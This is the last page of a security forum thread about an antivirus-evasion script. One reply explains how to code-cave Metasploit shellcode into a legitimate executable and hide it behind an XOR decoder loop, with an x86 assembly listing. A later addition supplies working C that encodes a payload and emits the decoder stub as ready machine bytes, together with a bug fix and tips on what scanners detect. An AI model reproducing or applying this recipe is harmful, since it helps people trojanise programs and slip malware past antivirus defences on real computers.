Page 12 of 12
Results 111 to 114 of 114

Thread: [script] for AV evasion

  1. #111
     Just burned his ISO (Join Date: Apr 2008, Posts: 3)

    Default Re: [script] for AV evasion

    The script is out of date and not useful anymore by default.
    Here is the result: https://www.virustotal.com/file/f088...is/1350717852/

    thanks for the script.

  2. #112
     Just burned his ISO (Join Date: Apr 2012, Posts: 4)

    Default Re: [script] for AV evasion

    Can anyone explain to me how XOR obfuscates the shellcode, which I can then put in the temp.c that is created by this script? I'm trying to understand how this works, so I'm going to try and do it manually, without the script. I know it's outdated, but can anyone explain it to me?

  3. #113
     ShadowMaster, Senior Member (Join Date: Jul 2011, Location: /root, Posts: 189)

    Default Re: [script] for AV evasion

    I haven't really looked at the script in depth for what it does, but I can tell you basically what's going on from my CTP experience with code caving. Using this to generate exes, as pointed out above, is not advisable; it's much better to code-cave something yourself. Look online for in-depth tutorials, but here's the gist. Take a program and open it in a debugger. Find an empty section or create your own, and replace the first few instructions with a jump to the empty section, saving the first few instructions, the value in ESP, and the start address in Notepad or whatever. MAKE SURE TO SAVE ALL ADDRESSES! Then generate your shellcode using MSF and paste it into the exe at around 100 bytes past your jump point, for ample space to play around.

    Here's where XOR encoding comes in. Since the shellcode is analyzed by every AV, you must turn it into something that the AV can't recognize. By far the easiest way is XOR encoding, since double XOR encoding returns the original shellcode. The way to do that is to write an XOR loop. The easiest XOR loop is a one-byte jmp, but I prefer a 4-byte jump with a variable key if it's slightly harder to configure.

    So now your program looks like this:

    JMP TO CAVE
    ORIGINAL CODE
    .
    .
    .
    JMP POINT (CAVE)
    NOPs
    XOR ENCODER
    NOPs
    SHELLCODE
    .
    THE INSTRUCTIONS YOU OVERWROTE!!!!!
    MOV ESP, ORIGINAL VALUE!!!!
    JMP BACK TO ORIGINAL PROGRAM!
    ...


    Now here's how to program an XOR loop. Basically, from the start of the shellcode until the end: XOR the shellcode with the key, then INCREMENT or ADD 4 to EAX, then JMP to the XOR LOOP START until EAX > SHELLCODE LAST MEM ADDRESS.

    Assume 0001 is the start address of the shellcode for simplicity, and 00ff is the end of the shellcode.
    Also assume that 1000 is the start address of the encoder. Our loop now looks like this:

    ; addresses follow the real 32-bit x86 instruction lengths (5, 6, 3, 5, 2 bytes)
    1000  MOV  EAX, 0001
    1005  XOR  DWORD PTR [EAX], 66656172   ; YOUR KEY IN HEX!!! I usually use something like 0x66656172, which is "fear" in ASCII
                                           ; [the other option is XOR BYTE PTR [EAX], 0x{one-byte key}]
    100B  ADD  EAX, 4                      ; [with the other option this would be INC EAX]
    100E  CMP  EAX, 00ff
    1013  JLE  1005                        ; back to the XOR until EAX > 00ff

    That basically does all I described. At this point, place a breakpoint at the end of the encoding loop, then let it run and save all the changed shellcode in the file. Then, when you rerun the program, the encoding loop decodes it and runs the shellcode normally. This will hopefully change the shellcode enough for it to be unrecognizable to any AVs. I hope this helps.
    World Domination is such an ugly phrase. I prefer the term World Optimization.
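As an added example (not from the original post, and not part of the script this thread is about), here is a host-side C model of the loop ShadowMaster describes: the same DWORD-wise XOR with the key 0x66656172 from the post, and an emitter that produces the decoder stub as the exact x86 bytes behind the listing above (MOV EAX, imm32 / XOR DWORD PTR [EAX], imm32 / ADD EAX, 4 / CMP EAX, imm32 / JLE). The payload is a constructed placeholder string, not shellcode, and the function names, the STUB_LEN constant and the 0001/00ff/1000 addresses are this example's own assumptions (the addresses are the ones the post picked for illustration).

```c
/*
 * Added example, not from the original post or the script under discussion:
 * a host-side C model of the XOR encode/decode loop described above.
 * The payload is a constructed placeholder string, NOT shellcode. The key
 * 0x66656172 ("fear") and the addresses 0001/00ff/1000 are taken from the
 * post; function names and STUB_LEN are this example's own.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STUB_LEN 21   /* mov(5) + xor(6) + add(3) + cmp(5) + jle(2) */

/* XOR buf[0..len) in place with a 32-bit key, byte i using key byte i % 4,
 * which is what "XOR DWORD PTR [EAX], key / ADD EAX, 4" does to whole
 * DWORDs on little-endian x86. Unlike the post's loop, the trailing
 * len % 4 bytes are handled here instead of overrunning the buffer end.
 * Applying it twice with the same key restores the input. */
void xor_dword_inplace(uint8_t *buf, size_t len, uint32_t key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= (uint8_t)(key >> (8 * (i % 4)));
}

/* Emit the post's 32-bit x86 decoder loop as machine code:
 *   1000  mov  eax, start            B8 imm32
 *   1005  xor  dword ptr [eax], key  81 30 imm32
 *   100B  add  eax, 4                83 C0 04
 *   100E  cmp  eax, end              3D imm32
 *   1013  jle  1005                  7E F0   (rel8 = 0x1005 - 0x1015)
 * start/end are the first and last byte of the encoded shellcode.
 * JLE is a signed compare; for addresses above 0x7FFFFFFF use JBE (76).
 * Returns the number of bytes written (STUB_LEN). */
size_t build_decoder_stub(uint32_t start, uint32_t end, uint32_t key,
                          uint8_t out[STUB_LEN])
{
    size_t n = 0;
    int i;
    out[n++] = 0xB8;                                   /* mov eax, imm32 */
    for (i = 0; i < 4; i++) out[n++] = (uint8_t)(start >> (8 * i));
    out[n++] = 0x81; out[n++] = 0x30;                  /* xor dword ptr [eax], imm32 */
    for (i = 0; i < 4; i++) out[n++] = (uint8_t)(key >> (8 * i));
    out[n++] = 0x83; out[n++] = 0xC0; out[n++] = 0x04; /* add eax, 4 */
    out[n++] = 0x3D;                                   /* cmp eax, imm32 */
    for (i = 0; i < 4; i++) out[n++] = (uint8_t)(end >> (8 * i));
    out[n++] = 0x7E; out[n++] = 0xF0;                  /* jle -16, back to the xor */
    return n;
}

/* Convenience for inspecting a single stub byte; 0 if i is out of range. */
uint8_t stub_byte(uint32_t start, uint32_t end, uint32_t key, size_t i)
{
    uint8_t stub[STUB_LEN];
    build_decoder_stub(start, end, key, stub);
    return i < STUB_LEN ? stub[i] : 0;
}

/* Encode, check that the bytes actually changed, decode, and compare with
 * the original. Returns 1 when the round trip works, 0 otherwise. */
int roundtrip_ok(const uint8_t *payload, size_t len, uint32_t key)
{
    uint8_t tmp[256];
    int changed;
    if (len == 0 || len > sizeof tmp) return 0;
    memcpy(tmp, payload, len);
    xor_dword_inplace(tmp, len, key);
    changed = memcmp(tmp, payload, len) != 0;
    xor_dword_inplace(tmp, len, key);
    return changed && memcmp(tmp, payload, len) == 0;
}

static void hexdump(const char *label, const uint8_t *p, size_t n)
{
    size_t i;
    printf("%s:", label);
    for (i = 0; i < n; i++) printf(" %02x", p[i]);
    printf("\n");
}

int main(void)
{
    /* Constructed placeholder, deliberately not a multiple of 4 bytes long. */
    uint8_t payload[] = "constructed placeholder payload";
    size_t len = sizeof payload - 1;
    uint32_t key = 0x66656172u;   /* "fear" */
    uint8_t stub[STUB_LEN];

    hexdump("plain  ", payload, len);
    xor_dword_inplace(payload, len, key);
    hexdump("encoded", payload, len);
    xor_dword_inplace(payload, len, key);
    hexdump("decoded", payload, len);

    build_decoder_stub(0x0001, 0x00ff, key, stub);
    hexdump("stub   ", stub, STUB_LEN);
    return roundtrip_ok(payload, len, key) ? 0 : 1;
}
```

Two things worth checking against the listing in the post: with a start of 0001, an end of 00ff and a 4-byte stride, the final XOR in the post's loop lands at 00fd and touches 0100, one byte past the shellcode, so either pad the cave with NOPs after the payload (as the post's layout does) or stop the loop at end - 3; the C encoder instead handles the tail byte by byte. Also note that the key itself appears in clear in the stub (bytes 7..10), so the decoder, not only the payload, is what a scanner gets to see.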

  4. #114
     Just burned their ISO (Join Date: Mar 2013, Posts: 1)

    Default Re: [script] for AV evasion

    Hi all,

    Can anybody please explain the XOR section of this script?

    Thanks


